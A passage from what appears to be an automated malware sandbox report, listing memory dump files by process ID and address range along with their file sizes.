                                                                                                        3.5MB

                                                                                                      • memory/5312-299-0x00000001401FBC30-mapping.dmp
                                                                                                      • memory/5404-338-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5456-300-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5496-342-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5520-301-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5540-347-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5608-303-0x00000001402CA898-mapping.dmp
                                                                                                      • memory/5608-304-0x0000023D842B0000-0x0000023D842C4000-memory.dmp
                                                                                                        Filesize

                                                                                                        80KB

                                                                                                      • memory/5608-302-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                        Filesize

                                                                                                        7.0MB

                                                                                                      • memory/5716-305-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5772-248-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5828-355-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5852-352-0x0000000000402F68-mapping.dmp
                                                                                                      • memory/5964-249-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6036-310-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6076-343-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6112-313-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                        Filesize

                                                                                                        284KB

                                                                                                      • memory/6112-314-0x0000000000401480-mapping.dmp
                                                                                                      • memory/6136-264-0x0000000000ED4000-0x0000000000FD5000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.0MB

                                                                                                      • memory/6136-253-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6136-361-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6136-267-0x0000000001100000-0x000000000115C000-memory.dmp
                                                                                                        Filesize

                                                                                                        368KB